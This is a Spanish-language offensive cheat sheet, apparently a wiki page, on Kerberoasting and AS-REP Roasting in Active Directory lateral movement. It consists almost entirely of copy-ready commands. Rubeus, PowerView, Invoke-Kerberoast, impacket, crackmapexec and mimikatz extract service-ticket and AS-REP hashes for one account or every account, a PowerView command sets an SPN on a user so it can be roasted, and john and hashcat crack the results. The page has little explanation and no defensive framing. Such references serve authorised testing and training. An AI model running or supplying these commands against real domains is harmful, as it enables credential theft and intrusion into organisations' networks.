5. Movimiento lateral
5.1. Kerberoasting
5.1.1. SPN identificadas
_Extracción de hashes_
Cuenta específica
Rubeus.exe kerberoast /user:<user> /rc4opsec /outfile:hashes.txt
Request-SPNTicket -SPN "<SPN>" -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -request-user <USER> -outputfile hashes.txt
Todas las cuentas
#Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat <Hashcat:John> > hashes.txt
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
crackmapexec ldap DC-IP -u <USER> -p <PASS> --kerberoasting hashes.txt
impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -outputfile hashes.txt
#From memory to disk
kerberos::list /export
_Cracking Hashes_
john
john --wordlist=<wordlist path> hashes.txt
hashcat
hashcat -m 13100 --force -a 0 hashes.txt <wordlist path>
5.1.2. Set SPN
Set-DomainObject -Identity <USER> -Set @{serviceprincipalname='Service/Name'}
5.2. ASREPRoast
_Obtención de hashes_
De una cuenta específica
#ASREPRoast.ps1
Get-ASREPHash -UserName <USER> -Verbose
De todas las cuentas
Rubeus.exe asreproast /format:<hashcat:john> /outfile:hashes.txt
crackmapexec ldap DC-IP -u <USER> -p <PASS> --asreproast hashes.txt
GetNPUsers
#with Creds
impacket-GetNPUsers -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -format <hashcat:john> -outputfile hashes.txt
#with users
impacket-GetNPUsers -request -dc-ip IP -usersfile users .txt <Full.Domain>/ -format <hashcat:john> -outputfile hashes.txt
_Cracking hashes_
john
john --wordlist=<wordlist path> hashes.txt
hashcat
hashcat -m 18200 --force -a 0 hashes.txt <wordlist path>
Last updated
Was this helpful?